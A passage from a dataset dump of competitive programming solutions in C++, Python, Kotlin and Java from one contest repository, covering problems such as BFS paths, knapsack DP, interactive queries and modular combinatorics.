++i)\n a[s[i] - 'a']++;\n if (*max_element(a.begin(), a.end()) > (n + 1) / 2)\n {\n cout << \"IMPOSSIBLE\" << \"\\n\";\n return;\n }\n for (int q = n; q > 0; --q)\n {\n int i = max_element(a.begin(), a.end()) - a.begin();\n if ((q & 1) == 0 || a[i] != (q + 1) / 2)\n {\n for (i = 0; !a[i]; i++);\n if (i == prev)\n for (++i; i < 26 && !a[i]; ++i);\n }\n cout << (char) (i + 'a');\n a[i]--;\n prev = i;\n }\n cout << \"\\n\";\n}\n\nint main()\n{\n int n;\n cin >> n;\n for (int i = 0; i < n; ++i)\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4732673168182373, "alphanum_fraction": 0.4867986738681793, "avg_line_length": 33.431819915771484, "blob_id": "475f4f4c5ce8e16c8541af95b85758c0c93c3ffc", "content_id": "cfcd1ca4d40738a96d89b7e3415a26a975c8c18a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3030, "license_type": "no_license", "max_line_length": 928, "num_lines": 88, "path": "/CodeForce/0390/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nint n, m, k;\nint ans = 0;\nvector<pii> trace;\nstruct tri\n{\n int a, b, c;\n tri(){};\n tri(int a, int b, int c)\n {\n this->a = a;\n this->b = b;\n this->c = c;\n }\n};\nqueue<tri> q;\nbool u[51][51];\n\nvoid bfs()\n{\n while (true)\n {\n int i = q.front().a;\n int j = q.front().b;\n int d = q.front().c;\n q.pop();\n if (u[i][j] || i >= n || j >= m)\n continue;\n --k;\n u[i][j] = true;\n ans += d;\n trace.pb({i + 1, j + 1});\n if (!k)\n return;\n\n q.push(tri(i + 1, j, d + 1));\n q.push(tri(i, j + 1, d + 1));\n }\n}\n\nvoid run()\n{\n readln(n, m, k);\n q.push(tri(0, 0, 1));\n bfs();\n cout << ans << endl;\n for(int i = trace.size() - 1; i >= 0; --i)\n {\n auto t = trace[i];\n printf(\"(1,1) \");\n for (int i = 2; i <= t.second; i++)\n printf(\"(%d,%d) \", 1, i);\n for (int i = 2; i <= t.first; i++)\n printf(\"(%d,%d) \", i, t.second);\n enter;\n }\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.2908704876899719, "alphanum_fraction": 0.3205944895744324, "avg_line_length": 28.4375, "blob_id": "cb14474f892f41f62276fb1161b6f9c485e00b41", "content_id": "0ecaa9c7034aa591f0a5218f3e1a2fc8ed3a7aab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 471, "license_type": "no_license", "max_line_length": 216, "num_lines": 16, "path": "/2015/gcjQual/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\nstd::string ans[2] = {\"GABRIEL\", \"RICHARD\"};\n\nint main()\n{\n int t, x, n, m;\n std::cin >> t;\n for (int test = 0; test < t; )\n {\n std::cin >> x >> n >> m;\n if (n > m)\n std::swap(n, m);\n std::cout << \"Case #\" << ++test << \": \" << ans[((n * m) % x != 0) || (n < x && m < x) || (x > 6) || x == 5 && (n <= 2 || n == 3 && m == 5) || x == 6 && n <= 3 || x == 3 && n <= 1 || x == 4 && n <= 2] << \"\\n\";\n }\n}\n" }, { "alpha_fraction": 0.3469387888908386, "alphanum_fraction": 0.37755101919174194, "avg_line_length": 12, "blob_id": "d3cf95bc7d1e58f920d2d47f9380690ba97c8919", "content_id": "0410ec0647badbe3687199afb8a22b7c3e38fe3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "no_license", "max_line_length": 17, "num_lines": 7, "path": "/CodeForce/0672/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\r\ns = ''\r\ni = 1\r\nwhile len(s) < n:\r\n s += str(i)\r\n i += 1\r\nprint(s[n - 1])\r\n" }, { "alpha_fraction": 0.47382813692092896, "alphanum_fraction": 0.48515623807907104, "avg_line_length": 27.76404571533203, "blob_id": "5c9dd2cab69aadbc00174bbae00202c5f02598df", "content_id": "07c1fd16aac4713be0c79eada7fd4084e2a53330", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2560, "license_type": "no_license", "max_line_length": 96, "num_lines": 89, "path": "/CodeForce/1298/E.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*\nimport kotlin.math.*\nimport kotlin.collections.*\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun PrintWriter.readSolveWrite() {\n fun writeln(vararg strings: Any) {\n println(strings.map{if (it is IntArray) it.joinToString(\" \") else it}.joinToString(\" \"))\n }\n val (n, k) = getIntArray()\n val score = getIntArray()\n val bad = Array<ArrayList<Int>>(n, {ArrayList<Int>()})\n for (i in 0..k - 1) {\n var (u, v) = getIntArray()\n --u\n --v\n if (score[u] > score[v])\n bad[u].add(v)\n else if (score[v] > score[u])\n bad[v].add(u)\n }\n val ans = IntArray(n, {0})\n val b = score.zip(0..n - 1).sortedBy{it.first}\n\n var cnt = 1\n var last = 0\n for (i in 1..n - 1)\n if (b[i - 1].first == b[i].first) {\n ans[b[i].second] = last\n cnt++\n } else {\n ans[b[i].second] = last + cnt\n cnt = 1\n last = ans[b[i].second]\n }\n\n val was = mutableSetOf<Int>()\n for ((_, u) in b) {\n for (v in bad[u])\n if (was.contains(v))\n ans[u]--\n was.add(u)\n }\n writeln(ans)\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\ndata class Pt(val x: Int, val y: Int, val i: Int, var ans: Int)\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.40668347477912903, "alphanum_fraction": 0.4249684810638428, "avg_line_length": 27.836362838745117, "blob_id": "869052669690e8b61a1e22efb447ded327beda2b", "content_id": "9551cc7b58973099630de422abd2e77e2dd82105", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1586, "license_type": "no_license", "max_line_length": 98, "num_lines": 55, "path": "/Ann/main2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <vector>\n#include <iostream>\n#include <iomanip>\n#include <future>\n\nusing std::cout;\nusing std::vector;\n\nvoid printArray(vector<vector<double>>& a)\n{\n for (int i = 0; i < a.size(); ++i, cout << \"\\n\")\n for (int j = 0; j < a[0].size(); ++j, cout << \" \")\n cout << std::fixed << std::setw(5) << a[i][j];\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n freopen(\"output.txt\", \"w\", stdout);\n cout.precision(2);\n int w, n;\n std::cin >> w >> n;\n vector<vector<double>> d(n + 1, vector<double>(w + 1, 0)), a(n + 1, vector<double>(w + 1, 0));\n vector<vector<int>> parent(n + 1, vector<int>(w + 1, -1));\n vector<int> ans;\n for (int i = 1; i <= w; ++i)\n for (int j = 1; j <= n; ++j)\n std::cin >> d[j][i];\n //printArray(d);\n\n for (int i = 1; i <= n; ++i)\n for (int c = 0; c <= w; ++c)\n for (int k = 0; k <= c; ++k)\n if (a[i][c] < a[i - 1][c - k] + d[i][k])\n a[i][c] = a[i - 1][c - k] + d[i][k],\n parent[i][c] = k;\n //printArray(a);\n\n std::function<void(int, int)> findans = [&](int k, int s)\n {\n if (k == 0)\n return;\n if (parent[k][s] == -1)\n findans(k - 1, s),\n ans.push_back(0);\n else \n findans(k - 1, s - parent[k][s]),\n ans.push_back(parent[k][s]);\n };\n findans(n, w);\n cout << \"Overall profit is \" << std::fixed << a[n][w] << \"\\n\";\n for (int i = 0; i < n; ++i)\n cout << ans[i] << \" y. e goes to \" << (i + 1) << \"-th\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.32565218210220337, "alphanum_fraction": 0.3578260838985443, "avg_line_length": 31.380281448364258, "blob_id": "ba16f43cc2cfcdc2d52a7ff317a158c25c677f5c", "content_id": "d4f4cce8c7a8e4c5742a81d9ff4f30a9f130bab5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2300, "license_type": "no_license", "max_line_length": 118, "num_lines": 71, "path": "/2023/tin/7.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n# python 3.10\nfrom datetime import datetime\n\n\ndef get(x, m, s):\n return [x, m[2], m[3], m[4], m[5] , f\"{m[0]}{m[1] * s if m[1] * s >= 10 else '0' + str(m[1] * s)}:00Z\", f'{s}min']\n\n\n# [h, mod, start, max, min, close]\ndef generate_candles(a) -> str:\n ret = []\n f = {}\n for c in a:\n x, p, d = c.split(',')\n if not x in f:\n f[x] = {\n 'one': [-1] * 6,\n 'two': [-1] * 6,\n 'five': [-1] * 6\n }\n dd = datetime.strptime(d, '%Y-%m-%dT%H:%M:%SZ')\n h = d[:14]\n mod = dd.minute\n\n if f[x]['one'][0] == -1 or f[x]['one'][0] != h or f[x]['one'][1] != mod:\n if f[x]['one'][0] != -1:\n ret.append(get(x, f[x]['one'], 1))\n f[x]['one'] = [h, mod, p, p, p, p]\n else:\n f[x]['one'][3] = max(f[x]['one'][3], p)\n f[x]['one'][4] = min(f[x]['one'][4], p)\n f[x]['one'][5] = p\n\n mod = dd.minute // 2\n if f[x]['two'][0] == -1 or f[x]['two'][0] != h or f[x]['two'][1] != mod:\n if f[x]['two'][0] != -1:\n ret.append(get(x, f[x]['two'], 2))\n f[x]['two'] = [h, mod, p, p, p, p]\n else:\n f[x]['two'][3] = max(f[x]['two'][3], p)\n f[x]['two'][4] = min(f[x]['two'][4], p)\n f[x]['two'][5] = p\n\n mod = dd.minute // 5\n if f[x]['five'][0] == -1 or f[x]['five'][0] != h or f[x]['five'][1] != mod:\n if f[x]['five'][0] != -1:\n ret.append(get(x, f[x]['five'], 5))\n f[x]['five'] = [h, mod, p, p, p, p]\n else:\n f[x]['five'][3] = max(f[x]['five'][3], p)\n f[x]['five'][4] = min(f[x]['five'][4], p)\n f[x]['five'][5] = p\n for x, v in f.items():\n if v['one'][0] != -1:\n ret.append(get(x, v['one'], 1))\n if v['two'][0] != -1:\n ret.append(get(x, v['two'], 2))\n if v['five'][0] != -1:\n ret.append(get(x, v['five'], 5))\n \n return '\\n'.join(map(lambda x: ','.join(x), sorted(ret, key=lambda x: [x[0], x[6], x[5]])))\n\nif __name__ == \"__main__\":\n a = []\n while True:\n try:\n input_str = input()\n a.append(input_str)\n except:\n break\n print(generate_candles(a))\n" }, { "alpha_fraction": 0.40807175636291504, "alphanum_fraction": 0.4115595519542694, "avg_line_length": 20.36170196533203, "blob_id": "c3e49cf74b0072b8d7065c5ab1198e3a917c822d", "content_id": "3abd6741c4838b1e804d1a4a80f363e90973701a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2007, "license_type": "no_license", "max_line_length": 63, "num_lines": 94, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.11/K.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.io.*;\n \npublic class K {\n \n final static String taskName = \"key\";\n \n long min(List<Long> cur) {\n long f = 0, t = 0;\n \n Collections.sort(cur);\n \n for (long l : cur) {\n long nf = l + f;\n long nt = l + t;\n \n if (t + 1 < nf) {\n return t + 1;\n }\n t = nt;\n \n }\n \n return t + 1;\n }\n \n public void solve() {\n int n = in.nextInt(), m = in.nextInt();\n List<Long> cur = new ArrayList<Long>(n + m);\n List<Long> ans = new ArrayList<Long>(m);\n while (--n >= 0) {\n cur.add((long) in.nextInt());\n }\n \n while (--m >= 0) {\n long a = min(cur);\n cur.add(a);\n ans.add(a);\n }\n \n for (long l : ans) {\n out.print(l + \" \");\n }\n \n }\n \n public void run() {\n try {\n in = new FastScanner(new File(taskName + \".in\"));\n out = new PrintWriter(new File(taskName + \".out\"));\n \n solve();\n \n out.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n \n FastScanner in;\n PrintWriter out;\n \n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n \n FastScanner(File f) {\n try {\n br = new BufferedReader(new FileReader(f));\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n \n String next() {\n while (st == null || !st.hasMoreTokens()) {\n try {\n st = new StringTokenizer(br.readLine());\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n return st.nextToken();\n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n \n public static void main(String[] arg) {\n new K().run();\n }\n}" }, { "alpha_fraction": 0.48039647936820984, "alphanum_fraction": 0.4980176091194153, "avg_line_length": 29.469799041748047, "blob_id": "57a58e4a8744f65ab19f8fbaa57f3f9e2ac4737b", "content_id": "97f142d185c681e852c9a5383943978d40aa0d8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4540, "license_type": "no_license", "max_line_length": 174, "num_lines": 149, "path": "/CodeForce/1364/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//cached\ntemplate<class T, class... Args>\nstruct cached\n{\n function<T(Args...)> f;\n map<tuple<Args...>, T> m;\n\n cached(const function<T(Args...)>& f) : f(f) { }\n\n T operator()(Args... args) {\n auto x = tuple(forward<Args>(args)...);\n if (auto it = m.find(x); it != m.end())\n return it->second;\n return m[x] = f(forward<Args>(args)...);\n }\n};\n\n//}}}\n\nvoid run()\n{\n mt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n ints(n);\n auto ask = cached<int, int, int>([&](int i, int j) -> int {\n if (i == j) return 2047;\n writeln(\"?\", i + 1, j + 1);\n cout.flush();\n ints(x);\n return x;\n });\n auto f = [&](int i, int j) {\n return ask(min(i, j), max(i, j));\n };\n auto getAns = [&](int i) {\n vector<int> ans;\n forj(n)\n if (i != j)\n ans.pb(f(i, j));\n else\n ans.pb(0);\n writeln(\"!\", ans);\n exit(0);\n };\n vector<pii> s;\n fori(n) s.emplace_back(12, i);\n int m = n;\n while (s.size() > 2)\n {\n cerr << s.size() << endl;\n vector<pii> t;\n int cur;\n while (true)\n {\n int x = s[rng() % s.size()].second;\n int y = s[rng() % s.size()].second;\n if (x == y)\n continue;\n int temp = ask(x, y);\n if (1 << (2 *__builtin_popcount(temp) - 1) <= s.size())\n {\n cur = x;\n break;\n }\n }\n for (const auto& [_, i]: s)\n t.emplace_back(__builtin_popcount(f(i, cur)), i);\n sort(all(t));\n while (t.rbegin()->first != t.begin()->first)\n t.pop_back();\n t.emplace_back(t[0].first, cur);\n s = move(t);\n }\n if (s.size() == 2)\n {\n while (true)\n {\n int X = rng() % n;\n int a = s[0].second;\n int b = s[1].second;\n if (X == a || X == b)\n continue;\n int x = f(X, a);\n int y = f(X, b);\n if (x < y)\n getAns(a);\n if (y < x)\n getAns(b);\n }\n }\n else if (s.size() == 0)\n cerr << \"NOT FOUND\" << endl;\n else\n getAns(s.begin()->second);\n\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5641931891441345, "alphanum_fraction": 0.5747938752174377, "avg_line_length": 18.295454025268555, "blob_id": "b681084f75f664ed40cc765d1e4824e6bff5b4d7", "content_id": "14ec8e070a189f8ddbfc47b2bc7496da41558f5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2547, "license_type": "no_license", "max_line_length": 85, "num_lines": 132, "path": "/CodeForce/0524/B.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\nimport java.util.*;\nimport java.math.BigInteger;\nimport java.util.Map.Entry;\n\nimport static java.lang.Math.*;\n\npublic class B extends PrintWriter {\n\n\tvoid run() {\n\t\tint n = nextInt();\n\n\t\tlong ans = 10000000L * 10000000L;\n\n\t\tlong[] w = new long[n], h = new long[n];\n\n\t\tfor (int i = 0; i < n; i++) {\n\t\t\tw[i] = nextLong();\n\t\t\th[i] = nextLong();\n\t\t}\n\n\t\tfor (long y = 0; y <= 1001; y++) {\n\t\t\tlong x = 0;\n\t\t\tboolean ok = true;\n\n\t\t\tfor (int i = 0; i < n && ok; i++) {\n\t\t\t\tlong a = min(w[i], h[i]), b = max(w[i], h[i]);\n\t\t\t\tok &= a <= y;\n\t\t\t\tif (b <= y) {\n\t\t\t\t\tx += a;\n\t\t\t\t} else {\n\t\t\t\t\tx += b;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif (ok) {\n\t\t\t\tans = min(x * y, ans);\n\t\t\t}\n\t\t}\n\n\t\tprintln(ans);\n\n\t}\n\n\tvoid skip() {\n\t\twhile (hasNext()) {\n\t\t\tnext();\n\t\t}\n\t}\n\n\tint[][] nextMatrix(int n, int m) {\n\t\tint[][] matrix = new int[n][m];\n\t\tfor (int i = 0; i < n; i++)\n\t\t\tfor (int j = 0; j < m; j++)\n\t\t\t\tmatrix[i][j] = nextInt();\n\t\treturn matrix;\n\t}\n\n\tString next() {\n\t\twhile (!tokenizer.hasMoreTokens())\n\t\t\ttokenizer = new StringTokenizer(nextLine());\n\t\treturn tokenizer.nextToken();\n\t}\n\n\tboolean hasNext() {\n\t\twhile (!tokenizer.hasMoreTokens()) {\n\t\t\tString line = nextLine();\n\t\t\tif (line == null) {\n\t\t\t\treturn false;\n\t\t\t}\n\t\t\ttokenizer = new StringTokenizer(line);\n\t\t}\n\t\treturn true;\n\t}\n\n\tint[] nextArray(int n) {\n\t\tint[] array = new int[n];\n\t\tfor (int i = 0; i < n; i++) {\n\t\t\tarray[i] = nextInt();\n\t\t}\n\t\treturn array;\n\t}\n\n\tint nextInt() {\n\t\treturn Integer.parseInt(next());\n\t}\n\n\tlong nextLong() {\n\t\treturn Long.parseLong(next());\n\t}\n\n\tdouble nextDouble() {\n\t\treturn Double.parseDouble(next());\n\t}\n\n\tString nextLine() {\n\t\ttry {\n\t\t\treturn reader.readLine();\n\t\t} catch (IOException err) {\n\t\t\treturn null;\n\t\t}\n\t}\n\n\tpublic B(OutputStream outputStream) {\n\t\tsuper(outputStream);\n\t}\n\n\tstatic BufferedReader reader;\n\tstatic StringTokenizer tokenizer = new StringTokenizer(\"\");\n\tstatic Random rnd = new Random();\n\tstatic boolean OJ;\n\n\tpublic static void main(String[] args) throws IOException {\n\t\tOJ = System.getProperty(\"ONLINE_JUDGE\") != null;\n\t\tB solution = new B(System.out);\n\t\tif (OJ) {\n\t\t\treader = new BufferedReader(new InputStreamReader(System.in));\n\t\t\tsolution.run();\n\t\t} else {\n\t\t\treader = new BufferedReader(new FileReader(new File(B.class.getName() + \".txt\")));\n\t\t\tlong timeout = System.currentTimeMillis();\n\t\t\twhile (solution.hasNext()) {\n\t\t\t\tsolution.run();\n\t\t\t\tsolution.println();\n\t\t\t\tsolution.println(\"----------------------------------\");\n\t\t\t}\n\t\t\tsolution.println(\"time: \" + (System.currentTimeMillis() - timeout));\n\t\t}\n\t\tsolution.close();\n\t\treader.close();\n\t}\n}\n" }, { "alpha_fraction": 0.5136986374855042, "alphanum_fraction": 0.5314446091651917, "avg_line_length": 38.411041259765625, "blob_id": "e1c1da1d96eb296e907fab669567759c4b3b7e22", "content_id": "cffe983b021f7a4922c27450a13e97364c67bfcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6424, "license_type": "no_license", "max_line_length": 178, "num_lines": 163, "path": "/2022/snws3/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//modular\ntemplate<typename T = int, T mod = 998244353>\nstruct modular\n{\n T value;\n\n modular() : value(0) {}\n modular(const modular& other) : value(other.value) {}\n modular operator=(const modular& other) { value = other.value; return *this; }\n template<typename T1> modular operator=(const T1& other) { value = other % mod; if (value < 0) value += mod; return *this; }\n template<typename T1> modular(T1 const& other) { value = other % mod; if (value < 0) value += mod; }\n template<typename T1> modular(T1 const& num, T1 const& den) { *this = modular(den) ^ (mod - 2) * num; }\n template<typename T1> modular& operator^=(T1 const& deg) { modular a(*this); value = T(1); for (T1 n = deg; n > 0; n >>= 1) { if (n & 1) *this *= a; a *= a; } return *this; }\n template<typename T1> modular operator^ (T1 const& deg) const { return modular(*this) ^= deg; }\n inline modular& operator+=(modular const& t) { value += t.value; if (value >= mod) value -= mod; return *this; }\n inline modular& operator-=(modular const& t) { value -= t.value; if (value < 0 ) value += mod; return *this; }\n inline modular& operator*=(modular const& t) { value = (value * 1ll * t.value) % mod; return *this; }\n inline modular& operator/=(modular const& t) { return *this *= ~t; }\n inline modular operator+ (modular const& t) const { return modular(*this) += t; }\n inline modular operator- (modular const& t) const { return modular(*this) -= t; }\n inline modular operator* (modular const& t) const { return modular(*this) *= t; }\n inline modular operator/ (modular const& t) const { return modular(*this) /= t; }\n inline modular operator~ ( ) const { return modular(T(1), value); }\n inline bool operator==(modular const& t) const { return value == t.value; }\n inline bool operator!=(modular const& t) const { return value != t.value; }\n explicit operator T() const { return value; }\n\n inline friend ostream& operator<<(ostream& os, modular const& m) { return os << m.value; }\n inline friend istream& operator>>(istream& is, modular& m) { return is >> m.value; m.value %= mod; if (m.value < 0) m.value += mod; }\n};\n\n//}}}\n\nconst int N = 505;\nmodular<> states[N][N];\nbool used[N][N];\n//int new_states[N][N];\n\nvoid run()\n{\n ints(n, m, x, y);\n vector<set<int>> g(n), inv(n);\n fori(m)\n {\n ints(u, v); --u; --v;\n g[u].insert(v);\n g[v].insert(u);\n }\n fori(n)\n forj(n)\n if (i != j && !g[i].contains(j))\n inv[i].insert(j),\n inv[j].insert(i);\n vector<int> color(n, -1);\n vector<vector<int>> sizes;\n fori(n)\n if (color[i] == -1)\n {\n vector<int> counts(2, 0);\n bool ok = true;\n auto setColor = [&](int u, int c) {\n color[u] = c;\n counts[c]++;\n };\n auto two = [&](auto two, int u) -> void {\n for (int v: inv[u])\n if (color[v] == -1)\n setColor(v, 1 - color[u]),\n two(two, v);\n else\n ok &= color[v] != color[u];\n };\n setColor(i, 0);\n two(two, i);\n if (!ok) return writeln(0);\n sizes.pb(counts);\n };\n auto h = [&](int i, int j, const modular<>& ans) {\n states[i][j] += ans;\n used[i][j] = true;\n };\n h(0, 0, 1);\n for (const auto& v: sizes)\n {\n int l = v[0];\n int r = v[1];\n ROF(i, N - 1, 0)\n ROF(j, N - 1, 0)\n if (used[i][j])\n {\n auto& ans = states[i][j];\n h(i + l, j + r, ans);\n h(i + r, j + l, ans);\n if (r == 0)\n h(i + l, j + l, ans);\n ans = 0;\n used[i][j] = false;\n }\n }\n modular ret = 0;\n FOR(i, x, N)\n FOR(j, y, N)\n if (used[i][j])\n ret += states[i][j];\n writeln(ret);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i 